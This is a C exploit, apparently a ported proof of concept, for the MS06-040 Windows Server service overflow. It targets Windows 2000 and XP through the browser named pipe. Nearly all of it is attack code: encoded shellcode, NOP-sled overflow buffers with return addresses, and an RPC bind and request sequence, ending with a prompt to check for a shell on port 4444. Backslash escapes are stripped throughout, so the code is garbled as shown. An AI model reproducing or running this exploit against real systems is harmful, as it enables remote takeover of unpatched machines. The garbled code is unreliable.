/*
 * MS06-040 Remote Code Execution Proof of Concept
 *
 * Ported by ub3r st4r aka iRP
 * ---------------------------------------------------------------------
 * Tested Against:
 *  Windows XP SP1
 *  Windows 2000 SP4
 *
 * Systems Affected:
 *  Microsoft Windows 2000 SP0-SP4
 *  Microsoft Windows XP SP0-SP1
 *  Microsoft Windows NT 4.0
 * ---------------------------------------------------------------------
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 * PRIVATE v.0.2 (08-27-06)
 */

#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")

// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned char DCERPC_Bind_RPC_Service[] =
      
"x05x00x0Bx03x10x00x00x00x48x00x00x00x00x00x00x00"
      
"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00"
      
"xC8x4Fx32x4Bx70x16xD3x01x12x78x5Ax47xBFx6ExE1x88"
      
"x03x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
       "x2Bx10x48x60x02x00x00x00";

// request windows api: NetprPathCanonicalize (0x1f)
unsigned char DCERPC_Request_RPC_Service[] =
      
"x05x00x00x03x10x00x00x00x30x08x00x00x00x00x00x00"
      
"x18x08x00x00x00x00x1fx00xffxffxffxffx01x00x00x00"
       "x00x00x00x00x01x00x00x00x00x00x00x00";

       // path ...

unsigned char DCERPC_Request_RPC_Service_[] =
      
"xfax00x00x00x02x00x00x00x00x00x00x00x02x00x00x00"
       "x00x00x00x00xfax00x00x00x00x00x00x00";

unsigned char sc[] =
      
"x6ax51x59xd9xeexd9x74x24xf4x5bx81x73x13xa8x97x90"
      
"x88x83xebxfcxe2xf4x29x53x6fx67x57x68xd4x74xc2x7c"
      
"xddx60x51x68x6fx77xc8x1cxfcxacx8cx1cxd5xb4x23xeb"
      
"x95xf0xa9x78x1bxc7xb0x1cxcfxa8xa9x7cxd9x03x9cx1c"
      
"x91x66x99x57x09x24x2cx57xe4x8fx69x5dx9dx89x6ax7c"
      
"x64xb3xfcxb3xb8xfdx4dx1cxcfxacxa9x7cxf6x03xa4xdc"
      
"x1bxd7xb4x96x7bx8bx84x1cx19xe4x8cx8bxf1x4bx99x4c"
      
"xf4x03xebxa7x1bxc8xa4x1cxe0x94x05x1cxd0x80xf6xff"
      
"x1exc6xa6x7bxc0x77x7exf1xc3xeexc0xa4xa2xe0xdfxe4"
      
"xa2xd7xfcx68x40xe0x63x7ax6cxb3xf8x68x46xd7x21x72"
      
"xf6x09x45x9fx92xddxc2x95x6fx58xc0x4ex99x7dx05xc0"
      
"x6fx5exfbxc4xc3xdbxfbxd4xc3xcbxfbx68x40xeexc0x86"
      
"xccxeexfbx1ex71x1dxc0x33x8axf8x6fxc0x6fx5exc2x87"
      
"xc1xddx57x47xf8x2cx05xb9x79xdfx57x41xc3xddx57x47"
      
"xf8x6dxe1x11xd9xdfx57x41xc0xdcxfcxc2x6fx58x3bxff"
      
"x77xf1x6exeexc7x77x7exc2x6fx58xcexfdxf4xeexc0xf4"
      
"xfdx01x4dxfdxc0xd1x81x5bx19x6fxc2xd3x19x6ax99x57"
      
"x63x22x56xd5xbdx76xeaxbbx03x05xd2xafx3bx23x03xff"
      
"xe2x76x1bx81x6fxfdxecx68x46xd3xffxc5xc1xd9xf9xfd"
      
"x91xd9xf9xc2xc1x77x78xffx3dx51xadx59xc3x77x7exfd"
      
"x6fx77x9fx68x40x03xffx6bx13x4cxccx68x46xdax57x47"
       "xf8x67x66x77xf0xdbx57x41x6fx58";

int main(int argc, char* argv[])
{
       HANDLE hFile;
       NETRESOURCE nr;

       char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];

       unsigned int i;

       unsigned char szInBuf[4096];
       unsigned long dwRead, nWritten;

       unsigned char szReqBuf[2096];

       if (argc < 3){
               printf("[-] Usage: ms06040poc <host>
[target]n");
               printf("t1 - Windows 2000 SP0-SP4n");
               printf("t2 - Windows XP SP0-SP1n");
               return -1;
       }

       memset(szReqBuf, 0, sizeof(szReqBuf));

       if (atoi(argv[2]) == 1) {
               unsigned char szBuff[1064];

               // build payload buffer
               memset(szBuff, 'x90', 1000);
               memcpy(szBuff+630, sc, sizeof(sc));

               for(i=1000; i<1064; i+=4) {
                       memcpy(szBuff+i, "x04x08x02x00", 4);
               }

               // build request buffer
               memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
               memcpy(szReqBuf+44, "x15x02x00x00", 4); /*
max count */
               memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
               memcpy(szReqBuf+52, "x15x02x00x00", 4); /*
actual count */
               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
               memcpy(szReqBuf+1120, "x00x00x00x00", 4); /*
align string */
               memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
               memcpy(szReqBuf+1140 , "xebx02", 2);
       }
       if (atoi(argv[2]) == 2) {
               unsigned char szBuff[708];

               memset(szBuff, 'x90', 612); /* size of shellcode */
               memcpy(szBuff, sc, sizeof(sc));

               memcpy(szBuff+612, "x0ax08x02x00", 4);
               memset(szBuff+616, 'A', 8); // 8 bytes padding
               memcpy(szBuff+624, "x04x08x02x00", 4);
               memset(szBuff+628, 'x90', 32);
               memcpy(szBuff+660, "x04x08x02x00", 4);
               memset(szBuff+664, 'B', 8); // 8 bytes padding
               memcpy(szBuff+672, "x04x08x02x00", 4);
               memset(szBuff+676, 'x90', 32);

               // build request buffer
               memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
               memcpy(szReqBuf+44, "x63x01x00x00", 4); /*
max count */
               memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
               memcpy(szReqBuf+52, "x63x01x00x00", 4); /*
actual count */
               memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
               memcpy(szReqBuf+764, "x00x00x00x00", 4); /*
align string */
               memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
       }

       printf("[+] Connecting to %s ... n", argv[1]);

       _snprintf(szRemoteName, sizeof(szRemoteName),
"\\%s\ipc$", argv[1]);
       nr.dwType = RESOURCETYPE_ANY;
       nr.lpLocalName = NULL;
       nr.lpProvider = NULL;
       nr.lpRemoteName = szRemoteName;
       if (WNetAddConnection2(&nr, "", "", 0) !=
NO_ERROR) {
               printf("[-] Failed to connect to host !n");
               return -1;
       }

       _snprintf(szPipePath, sizeof(szPipePath),
"\\%s\pipe\browser", argv[1]);
       hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);

       if (hFile == INVALID_HANDLE_VALUE) {
               printf("[-] Failed to open named pipe !n");
               return -1;
       }

       printf("[+] Binding to RPC interface ... n");
       if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service,
sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL)
== 0) {
               printf("[-] Failed to bind to interface !n");
               CloseHandle(hFile);
               return -1;
       }

       printf("[+] Sending RPC request ... n");
       if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
               printf("[-] Unable to transmit RPC request
!n");
               CloseHandle(hFile);
               return -1;
       }

       printf("[+] Now check for shell on %s:4444 !n",
argv[1]);

       return 0;
}